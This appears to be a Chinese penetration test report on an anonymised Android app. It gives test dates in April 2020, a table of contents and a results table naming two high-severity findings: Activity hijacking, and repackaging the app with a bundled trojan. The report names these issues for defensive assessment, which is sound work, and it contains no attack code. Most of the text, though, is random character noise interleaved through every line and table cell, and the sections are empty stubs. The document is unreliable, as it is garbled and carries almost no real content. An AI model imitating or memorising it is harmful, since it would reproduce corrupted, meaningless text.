: ^; d/ u4 y3 Y5 M, U
! ~) v5 d) v7 x0 _ e0 c ! m* M* `' _3 P% C
9 T5 P% J2 G9 \
3 Q( [/ R- J; a! N! s8 u( c& t! A
4 I( P& J& h' c0 |/ ^
/ v1 [2 x4 \9 ~0 }( f* u9 z2 c
9 N h+ I0 j. p* g! O( M
1 g5 E3 ^. J$ _( Q. x. C2 X
3 Z& y8 F4 r# E1 Y
3 y: f8 M! ?3 w$ |
& I' [* o- g* b: u4 H 文档编号:
# E0 B, U. I9 T+ d' s! i2 Y7 n: f- ^
" q- W. g% B; `1 q+ C; Y
7 Z( G {6 {. S3 o
6 F! O3 [& Z$ k' c
" e/ f# }% ]: @' O# d9 ^) ?4 p. Y
6 g/ P( \; |' _: w* L4 d; ]- |- p8 H" d% X# W5 v' v
1 o- h% k( l) P0 ]
# S1 a3 [ k0 h7 o: E. m3 s7 d
1 H; q7 s' Y* i) e5 y, W! N+ Y" D7 M4 @( s
& G& w+ b) O U
; t+ p* b& W$ L4 |" z
9 _0 u, ] w' {9 D: o* @
) ]! X8 v2 i( W9 y 9 x0 l+ ?, ^3 a# ?% w4 ]
3 {" K2 Y* {" i5 m5 ` ! F8 o; N2 B' t0 Z0 V6 S
) D6 h: F* N4 V, ^2 c- g# k
1 S: N/ m* o6 n; @6 g# f
( P$ x3 k" W5 ~5 A! l8 X
8 z* p+ t) L2 {6 C& I% e
/ n5 F4 z5 U, q; R- Y
7 ]$ b9 q- l! y0 L! D% R4 P: Y3 N* r
- O& u1 U T& B+ {& ?
! t# u0 _. m' F. j- r& T
0 B1 \5 z/ L- V; b5 g- }& A. P
+ \6 g5 J: F/ Z3 ?# P. e
: \. \7 z; Z4 e: B 4 Q6 b, x3 J3 s
# k2 W2 e6 N' x$ J3 y( @, Q) y4 o/ Y
/ W) \$ q! {/ G8 u* T
# d2 V' f, k* b2 Y2 d& L
5 D' F# E$ e: p$ H2 _# l) o9 X
2 L1 [2 u( Y6 k# `$ A s4 V+ J
某某某APP渗透测试 7 N4 z; d2 q+ H) B; |( ] [
: |4 b7 w, S* G
& b, v& \6 h" a c/ o8 K% _9 o6 d0 P- @- Y$ E/ N5 A! H! X' R
/ J |' [8 ^7 ?/ {) V! ?6 I
0 Z r) q. V. l/ @/ c9 B4 x
6 F# B( P# y7 ~
1 x5 z; L0 Y: e2 ~+ F+ Q
. V, t5 ] S; R8 l9 e9 }& c
" Z N+ l- Q. V
y8 _: m# A& q+ Q& w, T, K$ {3 m+ E/ }$ j. o5 i
5 C+ V8 M1 j7 I( s8 n
9 W8 k; n! [+ s8 n( T
" {& U6 G5 \% [ Q" ^
# ^4 ]1 O' q3 _# y: A
+ S2 ~$ |- {+ l- ?! m k! V% @, j
1 T' i( F% g; j8 c! X3 W
7 \* a4 l! B0 s0 U* M
) q- K4 E1 }! t
3 J9 S# h* f+ U; ]3 T
' H3 _; F( s- j; G$ l3 G& k & q& t4 l( ^; j; L3 C& U
% l3 X9 m1 z* Y( g% }$ F
8 O2 i/ o# [1 Y6 e' [& ]
T% ~! M8 z* C- I" K
: c0 v0 z! K9 B+ U7 B3 Z9 d/ }" p4 I, ]% Q( U
/ s" N8 C3 E) r/ O
& Q! D1 D+ b1 Z: ^; h. A( Z 技 术 报 告
+ y5 J) R( r6 [; d; A7 o& U; Z5 d- ` o. ^& g% P
% f; y$ s8 j0 b+ u2 v' P7 ?9 S" \8 H6 ?! A
$ t4 q% d( A5 C
/ k6 H# C' ^$ j7 G0 S! } 1 b7 l/ r; |( r9 c) }* g6 l
! R; d6 |4 [; d) ]+ k
# Z+ E2 K: r. a( M9 k
: V( P# X' }/ ?# _( C
6 c' L/ O& e+ k3 V/ k Y! ~% `
* B. P2 D8 r! V% f( @5 d6 ?) x p; F- _! @" G- B, [1 Y
% g3 z9 \5 e4 V& N
; N( B0 U' Q0 c6 z1 b% o* C7 M- r, Y' q4 J- {* Q9 t
9 u* C! J+ ` U2 K- ~7 p2 ?' M( d3 J! I6 y) t
2 @1 y- t6 c. {* q$ y i
& P$ M% O/ r5 Z3 s7 k/ ?$ D
- G& x; K# ~# f q2 w
d+ U$ f5 f' F) _& U8 w! ~- F7 y , D6 M2 K# r. r
" z! G' t6 a/ b" k " X4 I" a& r3 c; x( m* @
7 s m* p. i% o9 ~
1 ]& Z& C7 C) N$ `; a& m
3 Z. N9 V- ^/ h' p- H' r
; ~& o$ d$ M1 E; J$ R7 P1 Y" L. a; Q# H' i: E
7 N8 Z1 _ B/ E/ @- a/ ~
7 J e3 P) n' u: C3 a W
4 K, v+ ~# _6 o; ^# V, v( T, r0 m+ f1 v" _5 R
$ G+ k6 t( W' l! _% S4 q
; T+ k1 C/ h/ P0 _
& t. o8 |9 K# v4 r6 c( }; @" j" J2 l
) A& @3 |& V9 _8 J6 h- n
. I/ J4 h' L% t* w. ]9 l1 \0 x0 R
1 o/ d; h+ a& G/ ]* F& F( L F0 {: @; k. C/ P; Y6 J% _
# u P: l0 k& v3 Q2 x# L/ G% C: |: H q4 Y) I1 z% B
' {" D3 h- c, y }5 ~
0 M0 v; J& O, F7 \2 s) B
- v7 J% b, n1 f1 z
/ ?7 m7 E6 ]. C 6 W2 F8 {8 O* ]% Z$ T# P4 P
" ^1 \9 w% B( q& R* z
; Q; d; M3 t4 }3 e
1 @& Y! a9 N( B' A; w& v, [
% }/ Z# y( C4 z+ b) @/ v4 Y1 q* S4 T( K+ z( |
3 }* w' B) o) o
' P5 t& m6 M. }4 H) E+ a" i
5 T0 D* B- A5 B; n9 e! \, @
3 v) F$ s; g9 U5 K# J* |* K, | $ s0 C4 P2 m, @1 [9 T1 D' Y% f# E
, V8 Q7 b' O) Y2 B0 P' G0 v
. Z/ w5 n& f) h% n, k2 O) J* A
- g0 P# `) m" k8 r
5 m+ k4 Z" H& B5 n1 u6 M
- b" e x1 {0 ~0 R4 V( M7 _+ B
" _- V7 ?1 z/ F/ |) ?; W
- y+ e+ s) r. Y# l; G 2 ^2 x7 Y, X% M& s. ~2 q! F
. i# F: X1 V+ r. N% ]3 O
6 A5 b# v4 C7 |/ F: M) D# J% Z% t0 V J, q+ R
: _- q% p3 Z3 G/ T8 ^* x! g' `2 ~' S) X
3 l; t$ V3 n: I- s9 d5 F+ O
0 g/ F8 ]/ m1 C( l
- v# I! X% V2 `" k) Z7 C/ B6 k# h% s- n
" T3 P1 R' _; l) V3 H 7 r% x3 v! [1 m O: W9 U
; A6 z7 Q' F T+ a 9 a& d& S' M( c/ r' E/ S( ]& a0 N
+ i u% ]7 J* X) A) o
! c, x$ H0 h& A* N3 S! B6 p" ^( l Q8 v; S$ u. P: z
% I- S. o: T* h% m
9 T* E2 B& [+ k. T' }; ]# X, \; a0 F
; Z- y4 @6 A# d) Z2 k+ y
/ e3 i# w2 Q, M1 F
" O( g" A( W: u) W' w8 C8 ~6 W% S1 L* E" J$ e1 ]) t3 s# M \
! U$ \ Y# N; H$ |8 I/ V! }" E/ s, U! W5 j1 S1 n f
2 J( N A9 J( ?$ x& u. z
, T3 C' Q8 ?1 C* l8 E* [+ {! T
" t5 |/ ^' x/ F! l/ _ M! r" j3 t, Y. P5 F( d9 z4 V* z8 I
' x& H8 S/ Z& p
7 D( f% Y5 d1 z- @ + S0 Y# `4 L& Z: F+ F+ H
; B. ?. m: L# W
! p4 j3 f' p+ p: h7 Y- U" u
! E5 q" X0 D1 l/ c ! _: q- B3 ~. v0 Y! M
2 n7 j- W! N& O! ^ 2 v5 P% z& x5 {/ W& M, c
) A3 g/ D1 q6 ^' _+ _2 w+ X1 z
7 m7 y' h7 D; }. c6 b. q0 {
1 `% i- x4 w( e+ A
. ], W' U; X, } ^0 E5 @% H; {$ h7 H6 a4 R! z
! v" t- ]% F0 g: @
' c: r1 t( _. o, f- B. D7 e) s
' M% u" B6 j9 l* W. o6 D
% F$ D) ^" T" ~; B
3 O5 \9 S9 x/ O. h2 f4 a5 z# B! r7 K; O5 T1 s% |6 @
二〇二〇年 0 }% \' w5 H: C3 ?
' ^" q. v9 Y# {. h' m
$ }3 S4 Y! h. g( E z9 L+ T
. B: B9 u- p1 R c& K 9 W" L% U3 c. a, C
! x1 G' O7 f8 r7 u% H: H
& N k- e( e3 X t; {( N9 p& m* }, {9 t
1 Q( k/ ] ?$ I5 P# m( u5 c+ K
7 e! S' m2 X9 }7 p4 g1 d0 [. p# N( [8 h
. H; S) B/ O* Q
7 V6 P4 F" c, y1 H4 Y6 V$ Y) D+ G
% Q4 S" m6 W7 p; ^, o5 J+ S7 G; q
- f! S& p7 S% S' N; n
1 S' v, q: D! i
* ^/ J: c- i( t: I* w2 D 5 g( ?) H T. p+ b1 d( E9 _5 ]* b
' w3 n, h/ [ K" q F# r# D
4 b; Y4 i, I2 `, _0 C( Y8 v7 {+ }+ Y
% j4 j5 V+ n8 I
7 h4 N4 q% u/ H) J
. b" y5 z/ Q0 n* X
目 录 % [1 K1 ?7 E/ ^ |$ h8 k
% S, A: b* Q7 \; Y3 ]
' t+ L2 K3 e4 i
+ p8 u3 K! w- i8 B0 p, o2 M% ^5 ~& j
! [& f, F7 @1 b
' ^: `$ v/ `4 k# A% e" f; k, V% R( [
4 d( Q( g' e4 O; D+ P; {8 @$ i" [; Q. C7 U) y
3 Q; B# M, t5 `2 Z( G% L
" k |/ N H" V; H3 E0 P3 L# K
4 o* ^9 X v9 P' [
! U- ?) e0 D( b2 |+ ? 2 r: b$ s" ?% S
/ w: D7 ^: T* Z& p9 x- Z3 B o 1 概述... 3 ! k3 A4 K& Y0 M- D$ h
) ?, m1 |3 G2 H' O0 i
0 w& \: t' S' R/ X
0 G6 }; p# t) L4 u
( j( U g' R u `7 Y* p+ N3 Q/ b9 V4 Q: z0 V
1.2测试时间... 3
& C B6 d. B1 g0 U
5 C n6 p/ V! N6 @) a
2 q3 h a' f& O( V- M
1 E- E( _, a' J2 g3 l( S
3 C. C$ Y: m% Q' ], X
# m( t# c/ c7 u/ S/ o& c' }8 E
1.3测试对象... 3
7 e+ t9 T% Y1 f) p {4 |7 Y7 I
& f, K/ ^+ h/ ]- V& u! n2 r$ i/ M
. y) z0 @1 E Z) D: ?0 X" c7 L% W; g
: U% Z) x3 {; F
' m* W z( j$ f& {
1.4测试结果... 3
8 q5 S3 |; `* g' x. |6 R
4 w2 U0 q7 Q4 O6 P; i
$ {8 s4 v8 J0 U# x: [3 \% [* p# L7 u& i
( K# |. s2 P; ~4 [- ]( U# P, w1 q& u [+ M, R+ {( M' E
2 检测结果... 4 * ~7 }7 R, N5 f7 M$ b3 e5 G, _
9 }+ s/ u' s3 A
1 ^- C9 E9 f( J' z) W! i
( ?4 G- }+ r& ^8 ]$ A a; p
! x, D) c- k0 ~' z2 k0 h" X N8 k6 T/ y3 |8 b/ n
2.1 某某某... 4
! M# P& _ w. l* D; g+ ]; f* J* j
6 V% z4 ^1 e# w- I. `; p
- p e7 I, R1 p$ ]! y/ k4 D- R( r% ? y9 |
# `+ S n- y( `2 {2 ~+ K' B8 q" {% s4 m- |, t# {4 o3 Y
2.1.1检测目标... 4 / ^$ e- V3 t& j6 {& G
4 g( k! _& s+ o* k
$ ?- F, _9 E" C( b8 g, u) o/ O5 _* b
: c! H6 Z1 q( G9 z7 e- p/ n
: [. E# Q/ m" w3 R/ w
2.1.2检测结果... 4
5 o Q) m& s$ l# ]
& g, Y4 b/ G6 V; Q. B
3 H7 N% h: ]" g; R; ^$ }' r# S, h1 F& b% z! h- r; T6 ?
" \' f. S! U$ A f3 L0 P: A. R n- w3 K! J/ t% w
2.1.2.1. 4 ( B. ~4 Z$ L! E- m3 }9 y! F, a
4 L8 ~- \! v) A, O- L# }0 h
8 p$ {! l7 }) e) M0 O4 _6 Q3 g! S0 N/ D9 i+ Z
9 u R2 T B# m4 y2 x# {9 }
; N0 v1 T% m8 W0 ^2 Q' ` 2.1.2.2. 6
% c" F9 U( o' W* S7 o
2 o7 I |$ u+ d1 T, b1 j% i
4 m- x% ~ ^( I% s/ O
. N2 d$ q! u7 e
2 I0 R# a" W+ y" K# o, r) f
. Q O2 g5 z1 U7 g& @ }
) Z" G4 ~4 _1 x
/ o) e) E. _8 N7 @* p
4 e9 H0 ?( b- Y9 U$ z) e4 F
0 Y& R4 S$ u* \$ m
6 e5 d: S* l' e1 T% \. m
7 w/ P% v' }5 c3 n$ q 9 m o: W) _% X+ \% r4 `! t
* y6 x* N4 ]! e( U& p1 k0 p$ D) S
7 a3 V& q( m. s5 j
5 Q8 C. i0 O: l. |+ C" X+ ^% M* H
; j0 _" H- [& k6 I
( k7 z% M D6 e' M1 f$ ^5 D
( L9 p8 h0 H6 b6 E3 l; p0 p! R. ~3 L: H8 n* A
1 概述 ; [5 _% A8 n0 h+ J; S2 O
% z1 F3 e! ^) K8 I4 k
; ?! P: p* s5 z8 p3 J
/ r; ]; H3 @4 b F7 P1 \ ) v; p/ T9 F( c g- |! y6 ^. R
+ d. u! `: w1 X; d' S* W; t
1.2测试时间
D5 g9 B' h; `" c
$ n, j% b7 a& }2 M( ~+ _
- U) L- J1 @3 s! a. J
8 F# f$ I9 Q( Q. {" @
1 `0 J/ f5 n& m6 w$ B% s, g; b V4 l2 f4 @- K
1 D4 F) \% ]3 _: J( \: s' L0 }& d9 v
# L L4 `0 K6 R$ d' P: Q$ b
4 L$ Q; E3 w6 C | 0 O$ E3 _+ d D+ }2 [ @
: R9 Z8 g! _' f5 D1 G. |
1 {* [8 w5 b6 F, O8 Z
6 ^8 q! o( \% i1 ^& o2 D2 W3 \/ h2 o 渗透测试时间 & S# h: r: c. z- E( X
5 ^3 X4 l* g7 U1 y( A
& D, b- d0 O9 u) P% r& o0 K1 e) l5 q* K) V! O. B, @
| 8 W3 A1 X; z# J& a: e
$ u" U' V" {; l
# V8 n3 [# b+ ~6 T7 z: e) u; D& o9 \8 m+ N5 X
4 w1 N+ h2 ^2 P, k/ T3 C% L; K% z2 v4 D/ e+ e+ m
|
$ q& |7 p2 i) G9 M! h$ I
2 d4 C; p6 p0 e3 Q+ p- }# f1 E4 D
% ^ j& T0 e* U( z
5 T9 {; ?& H% K 起始时间 & @, d; x. l" w3 t
! e( h |( C4 O' z( q; v" _2 i
U* X" l. J4 G# X
6 O; O6 ^, }5 ?8 g/ v6 ] | $ d) `5 a( D6 O: x) d1 w
; [! i K. h1 f, D, b* A5 r
$ g m @# @$ J0 n6 c
' x( q) m+ G$ |0 |
4 r( y! X" ^. ^& \
8 e1 q' t2 x w. N8 E7 E! K 2020年4月6日
/ H# E1 @# N" ?2 r$ d/ b, U4 \! o n- p
( J4 R2 U/ e! D' X# M, c- u; A
5 n- x! d. @1 f2 O# Z
| 3 e: e! _, P7 Z
% m5 M& ^! @, ^2 D
4 q. I5 h" z9 e
- |6 s/ P9 M7 w; ]" N9 L
4 |+ Z; U) C' v* X$ }8 X/ k/ C& s; F/ e9 H% d7 H0 e: [/ R% Q
|
# |/ K$ } r! b8 b. g! f8 `) O- |4 H
6 B+ C3 a e9 A8 |5 l
) Y+ T/ U1 z- ~- w
结束时间 + V. V# J3 E& ]; b2 i
% a+ u n9 C+ I0 s" ]
$ W8 r7 V$ L; I: x9 O* x) E4 Z1 P! ]; q0 s& G, y0 o+ [) B% v
|
2 g. u8 U; ^1 ]) P3 a+ |6 S
V/ c! I: s7 ~: [$ Y8 L( P. _9 y
. _8 m( [' p% V; I! ?2 _: e& _; ]5 ]# f- ^2 F! D9 z. z! ^
) P6 t# \8 t6 n) F* R/ i3 Y
2 G6 \ E* @9 n5 h 2020年4月9日
9 u6 y4 n9 Y& b- {4 B" U9 ~8 z3 a. P# F5 O# o/ J
' K/ U% J8 ~- g# H
& C9 X# l* B3 B, p1 g4 W- F
| 1 \8 e' g$ `* ?$ k8 n+ p
0 p8 c8 O/ o% C# k; R3 [; s0 f3 d
! R; H- v/ N* S- o) _% z$ P4 s+ y$ y& ], }. Q/ E! T, e- ?
+ g, M8 u' {: ?- ^- l
9 A# n( |- M. q' D4 c
4 p6 _9 N. x& v8 Y! t/ m) H
4 D& u4 m/ ^9 ]7 h, B0 L( s2 H
+ S; u4 s( h( o2 o- E& o! a; {( F5 _+ J/ o" B0 y6 V X; S( W+ Z# j5 }4 H
1.3测试对象
' \ |! ~7 d) U$ Y8 s
! H5 U, O0 M% P+ p/ [0 I4 P
$ O; ~4 x F- ~* W s r1 U& a" w: f4 Y( q9 P# [
) O: V7 @- X* j
3 }+ L. f3 k/ I7 L! W 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: ! ^9 j: r6 o: G+ s
) S( j! P, w) l P) s) |
1 o$ R5 P4 U1 h. Y( ~' A o$ J( j: s. r9 s9 X
0 i5 W9 E1 _% j8 Q: }# X; U
) P5 K% k" m2 T. Y. u 表1-1 检测对象 0 S1 |8 x( X* \
$ X) T5 w' U! M
1 J. P/ f9 ~, ~. ?2 M+ Z1 t/ z1 q2 q# o; l% r& [( w# }
9 B2 q6 y! ^7 I, N6 e/ o: h8 |; v% {! K4 m+ [1 w$ ?
) j7 h3 X A5 O6 l9 u! Y @( a+ X( `! b- t) C8 y: B6 ^+ @
# L- s3 k1 S) J- T9 ^* @
* S/ ~* `9 y0 z# B
|
: y. J) ^: k( Z
/ |; D6 u: |2 ?& s: M" k# F W
. F/ M& m' f. P) p4 w: ?) T5 f
6 e' M) O5 l P, l5 I3 N+ D6 Q4 F 序号 * a0 q7 U/ x4 e2 S$ \) z
$ y; L2 m7 r, h1 U
* p/ h B3 N8 ^/ m; H$ n# G K% m' b6 k
| 3 w' V: b9 W% F
- v2 w# O3 t+ t" r! o2 d4 g ! n* W+ `; r" |! d: r
# b* f5 m2 L: |! Y/ z! d( O ) _7 P. \, R; ^' d
* [9 R5 K9 U; j! k: |/ F
测试对象 8 K" a/ O! U* o
+ n5 d0 @5 t E0 _) h
- H1 s2 |4 T5 V9 O! ~8 T L
6 [4 W& o& E1 c' b4 } | , v$ k: o z) |* ?7 S
0 R: J& y/ _( R6 i
3 S6 p% I$ y# u; z4 |2 f) Q1 B. L9 l* M
) T; N9 E( l; j+ G2 M' n. w6 x8 C/ d* M9 W; o: `( l( ^
测试地址 # Z, }$ F8 Z: I; Y; |
( U4 |: P0 _% U/ L. p
0 k# Z' v2 H" ~& P. g0 t
S: a5 v' `2 d5 s- b0 n0 o
| : X8 H; a3 }6 ?* p" ?7 A% r
$ i& L+ }6 o7 s7 v0 @& d2 y
' W" [) Z4 h% k" e
. a$ }1 m( N0 u8 A
- V- c4 [. X2 |. c; ]) Q; e3 E
5 m3 J8 z, c5 q& T' } 安全漏洞 ) q* t' y; E0 ]$ l+ `
' R. z. c3 D) U' V0 j
! k' |, f* O" D' p
+ g! v. [' c! g9 G! J |
3 x' X4 @( X/ k7 D3 ~3 G) X# f5 R' P) F1 b- \, v6 V7 y2 n; D& T& i' ^
# `) n+ s4 }0 h% h- m* m7 Z6 J: ^4 H* t& j* S6 o9 \/ l( h. E3 [
/ }; m1 H2 y/ v0 n# y" l# U2 L: t- s
7 m7 Z X/ R/ B/ {' \5 S, k! U |
- i8 ` K& T! H, L- _
; f4 C& T! L4 r% E; n
! e; s5 _. k+ l! w, [# M* t/ g
+ `5 X* _9 c! c( g 1
. Z- U6 K4 |" `
0 }' ^9 u& ~: J# |9 x0 ^ 0 y7 M9 M& j, l, q
Y) u4 Z' a( q5 W |
' d7 b5 x0 p& k. o) Y+ `9 t3 O+ K; H( U, \& r8 k) x" \5 D7 B
+ {1 u* U) p7 B: V+ d: E1 [# i
+ ~9 h# Z1 ^) f% J( q( S- i: r
; _( a) y5 ]" J& K( B3 g
- l! U3 ]8 E! X5 [/ i
某某某安卓APP
0 j3 C. R6 V7 x; H. R6 n) M& x; z2 r8 |! D
% z9 s% D' L3 Z$ O# ]0 y. G5 ]4 k6 h( J
| 1 h9 H+ J$ [; K/ E) o- v
! S) z, O$ P- `1 `9 o
# ?* J/ [) u7 h0 f' [. o* S% F& Q% M! ^
# ^8 T$ J9 c0 s# ]8 S+ B6 P
/ M, s! G; {" m' O
+ A6 P/ S) ^6 e$ w; [9 }8 n+ ]- l! N/ j2 C2 k! }" G9 I, q, n
9 r! X# m5 n+ E3 L/ h( o# H! A$ b
2 W$ v9 c% z% I& i: z | . c. J. W, [; I5 L4 p$ D0 N; e
& c/ H6 w7 j) {6 l4 B1 @
1 g+ z* s+ X- g8 r* u) A h0 O- C2 D2 I) H$ Q& y
* N! d" _7 F/ [4 ? m! [* b( y* u( |+ H
2
p% R, A |" \! Y+ T* v7 x
" U$ F8 I* x: g 6 N v* X2 g* K0 {1 e, _
, A; J9 D! o- ~1 H. L; M( M* S, a
| ( K3 X: ]- F/ _! }: y% j. T% t6 e! p
, z7 H6 H6 `& _6 Y
1 }4 M1 e5 A6 G0 i0 l0 Q& {
5 P: c7 s( h# E0 a4 r- P4 |
. ^, a1 l$ O5 n# l
4 Z3 [$ J) L; {
b$ ?$ m# G7 v0 R
- \! I: ]: j5 P! M6 @/ P
: e1 F# l, K# _ S; L9 j2 K7 g; E' Z) d- H/ U8 W& u1 \
1.4测试结果
; j0 k% Y, N+ g' N& |
; m9 \( Z x( z+ ~
: `2 z5 j# h$ ]9 [2 @
, _ \7 l* B5 m8 N # e! o Q V1 X+ ~" ~- D E
6 ~% N* D3 d; Z* `5 Y3 N
在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示:
6 e( ?$ P* _6 i( v0 m
( [$ i& M8 \+ b
3 S, G# }' J3 D3 B. {) S4 o# c. m% D( Y4 C' w
3 R( u2 U# f4 j1 d- c! T; ]
" _' Q# z" s/ b) R " V% x7 x$ @% h+ J& R$ i( m
E6 m- v. i- V$ h5 _: [* ]% [
/ L- n. s9 f& h; Z C7 }+ {* @) G: k% O3 r
. g. g& z$ L# s3 R; x/ w
9 o% Q$ N% U( w5 r9 ]6 Q
. ^: B* N- X8 m3 b# a& [
8 i+ n- l) }% K/ F' W
- e% e( Z |# K) q( T* k F, n+ o- \( B4 V
5 A+ z, @' e. B
& o/ x; o3 `$ x6 f4 H | $ |$ d6 n& R3 M; T' o
0 w2 b# }) u* O- Z( r
3 [- k. H' U# C# `
* \( A1 n1 W# M J, y0 _/ \- R
序号 * y$ Z% `2 c8 \4 v: p: {
+ k0 [: r6 p) `
* h6 D p: I1 X3 t: d8 I& r$ L' _7 b3 s5 D
|
- ~3 ~& e4 f* _
* F, K5 h# Q4 V- z8 H' W
9 s3 j. t7 I8 Y
8 l; R' C' |8 `% @ / x4 O7 |/ N' L! L( y
& R" e! A* I0 }) u! Y7 q; R5 {
系统名称 7 N- Z1 o' |* ^0 \
' [ A# B9 A8 ^7 i5 t* Q+ l $ A1 v; P( J8 T/ X" d
, j4 i: a5 `( C7 B! {, H! @ |
0 w3 P1 _- e" Q* y, M. e) y2 V. L
5 A( X( w; a" j6 j) _/ H3 x
* _1 m& c. D }6 Z d- f9 s" j9 ~4 \9 f) i
- I2 _! c& b) o. Y. A$ _
. D( }. ^' g8 T+ o6 y% G/ |$ v 漏洞名称
- j f2 D( i1 N* s, N9 C3 z7 T% u7 }8 a0 ?4 F
) k. }6 p$ o$ x% M
: h( U0 i1 w. f+ {, J
| $ M j. e$ u: O" Q+ S2 s
5 H$ g3 Z! ?$ O( ^4 f A
5 x2 {% _/ R( r s6 A2 X& ]/ Y9 k7 y2 `2 r
9 W: \" f8 I, I9 V% O d
# Y- y2 C' ~- [ 漏洞危害 $ w5 S) i3 r/ U( K; ], b* D# A: K
+ d0 R5 M& N$ h0 n' M0 e
; @$ E; ]6 M+ v& D' \0 V* h
8 L$ N) K1 S6 [ |
# y/ k' Y" Z6 }7 O3 Q1 Y0 K5 Z9 _
/ v& l: w0 {2 m- Q
! c2 d" _: z: [2 { 6 b. _3 X, ]* I8 y2 L7 R; U M: t* H! B
- H% _& G/ }' Q1 a 修复结果
x$ W( s5 F7 n( q+ s5 D9 l
( p/ c; B: s. j( I' l
% P( |# V# O! E# w" G0 R
& G) ~4 a, _4 J2 u | 8 X" m0 a: V+ q; r7 W& ~
" Z. h9 S7 a" Q1 t1 o) }3 z2 w9 O8 N
- n: b; v7 S8 N7 l, ]
5 V; d! H7 l& S8 j i( i% C + b3 X( m; X4 P9 S: M( m
; i3 O$ e5 M8 b4 ?9 L
|
2 f, `/ l1 T# ~ B F. F' \
# Q" |. v& u' y4 J( H
# `. n1 g* g; I4 F8 D5 }# }3 m2 d. b' G1 e
1
& H: G1 V; N0 t6 u
% }+ @) I$ f1 w - t9 h' t- R) O
" m& C" y4 U" d5 g6 K9 F
|
, C; X. @1 H1 `/ D6 J* n+ q
8 O% M: t5 W( A$ D' H. H : U& ?$ ?4 b- }" [
: \" w1 |" k3 Y2 {0 h/ f5 f' k
% }6 |- ]# f6 m1 r7 m
1 t V; a# j9 d) s# v- m! B 某某某某某某APP ' @0 Z) L- `; ~$ P
1 u x1 N4 P* F u% c
: B% D4 T! }, k, S% r, [
1 T# m, F8 N: j$ _$ v
| 4 h+ G1 }2 ~, z/ k s9 b- A' H, e/ _
4 [/ c+ X8 R% Q$ S ' V3 n) A5 k) x! d0 Q$ N) |
5 a/ K0 o! o3 n+ j5 O% X) \. v : \ x: x8 K* Q; h; d6 ?
0 n7 _( C% ~) J1 \& t( ]+ X1 E
Activity 劫持
* |' i4 p/ E# W' o- e3 X$ [8 B$ D
- p: o- \& _# K( c6 t + _# M$ W7 d: X- @
7 R7 e& h: A2 {6 {% @
. z% p* ]5 t! a
: ^# `7 A |) f# f& _* k3 I
8 ~6 y& Q4 H! t# p9 y* \# x
. {! z# d2 \7 G! G F! t3 G
+ u2 _3 L S0 \! ^# h" T
4 g/ a8 Y2 A2 }/ F& x2 G, V |
2 q1 N) v7 l6 m$ m w/ @) s$ l
2 L! s$ T1 V: H" i2 l4 }0 ^7 k
9 ^) E6 Y& B; S; `; ?* G8 Q: P7 F6 f: z& m. [
- R% n I, r1 Y; e- R. N- x6 i
! R2 k( g# f- u; T" C* @ 高 $ M* Y) H9 |$ M- a$ y% {
: f3 {1 @, [" H% T; F
5 r$ t; i% p) q( E& d
" ~! d4 @, B" {# [8 k* u2 z | 2 U5 Q) \- q' ], I5 k, P& S& q
6 Q7 A5 h2 S1 l$ [' X+ M % q5 ~1 b* j: H4 i' I
2 p6 y# e' M& M9 D
% X0 |& \5 \( C# a
9 G6 u: X, g0 }5 K, g" N& u2 h ( R& |6 W/ O1 a% c: S5 v0 y2 v
# ?) `, ~- j y7 D* R , [4 x! a0 G N4 q9 [
4 d U" S: l2 l9 G) M4 v, ~
|
. [, |6 Y6 c0 p" t& J k6 @
# s+ V$ Z* G. ]* Z2 t
' e4 M+ _ {& @ @% F1 l$ q& u& ~$ P0 J% e- R+ Q/ c
( L, l3 e6 k% I3 r# C' q" O5 J# g
r& d5 i- Q& r3 L8 V+ p, d |
2 t6 E3 l1 Q# y( r: f5 K; _
2 ?) a: y- ?. ~2 E/ U5 i* A8 p# { : e3 o* q7 L% i3 P
1 g! B3 u1 @5 h8 `" [
2
+ d1 d$ @. \5 \5 H! Z$ o4 X1 x o8 O! N9 ?& _
+ T5 O& D. V. t4 C4 d/ l
) ~4 z" l$ ]0 O- X( w4 o2 b | 9 S, x& [- x1 x' s) a S5 m" b1 ]
6 e# ~: P1 l5 ` 0 A- H) F* T8 K7 @) T5 k) L7 j
! {; h" u/ [2 p0 T% J
% V6 W+ i% T7 P" I( H; u. o% Y8 S
某某某某某某APP 9 e6 O0 ^- k9 J& B
5 R; g% t' c* R, |7 J( c 5 B5 G" ~) Z1 @: I6 b; S8 a
/ U$ \. s) B7 b* M0 J | 8 a( U' \* S+ a/ P7 q
9 c8 g5 @& l* e# u& s- v; f
0 ]- Y) V. R8 W9 Y! {- z# ]
* e, N/ s( F1 [% H
: { n' c/ Z' n" ^$ [& |1 D3 t' c# @; j4 J$ \9 @
反编译二次打包捆绑木马、篡改APP代码
/ q5 j6 m" o$ H9 f; Y
" Y0 ?& Q5 X" m# B& s; ^8 I7 \ ) Z8 y( N+ g9 B( [# K
( r! d7 [8 [/ O _* O
|
# E* N# N* Q5 V) I1 B! i5 P9 }" K4 B: u- t0 i( m' Z
6 i) s5 L8 O/ r: e2 E0 b- d: Q* R$ X( ^* e7 ]
7 b" S0 j ~: w# w, X: a+ v! V
6 L8 V, Z; X# V* } 高 . R# i! I% @9 {+ A3 c# u" D
, A3 V2 z3 [2 ^2 X. s1 N& X/ `
# B5 S* ^1 J3 f0 m( ~) |, [! K( n
, O* B' z9 ~" ] |
! w, j }7 l! P. h8 D* ~
. T# B q) K2 ?# Q- h
' h8 P# Y! S6 }! F# S; Q0 x) C: \$ ^) S, [$ w
" |. a% g! K! b& {$ k# z
' I+ Z% o ?# x9 i1 O$ n; g
1 n v+ J( b+ n
9 ]. Y, P+ t2 C, L6 b& y 1 h! u# V. b2 k) Q4 j1 n
0 i. O4 g5 W- ?4 S, [2 ?
|
' R, ?6 f) Q+ M( ~; Z) c+ c4 l" p* l% U5 x
1 M: `1 P" y. s
/ z! ` F* T0 @. r+ D
8 R n( [2 I1 M; l- p& `8 k. x) v J l. n" z
. X' Y2 g* @9 j! V( m2 H
( ]* d; j% _9 B* X# x3 h& p& V 7 d; z3 b' A: {5 r4 _' O$ V
/ A7 J- [4 V' |. Q1 s( b
0 L* v2 z4 X2 o9 s. }& f0 H
0 ?1 O) `0 D" t" K$ a) G* }8 H $ m2 R7 m; z" v" V" k9 V
+ P( O0 Q: [+ ]5 f: S
+ x7 I- e, B: m' Z. Q, V0 W. `
6 ^$ X; v: y/ a3 h* k1 D $ G( \- _& s7 I
) o3 a) N, r7 M9 Q 表1-2 测试结果
6 Y$ {% K( ^; R$ U/ p8 j, X( J# ]0 M* v7 d A5 a M
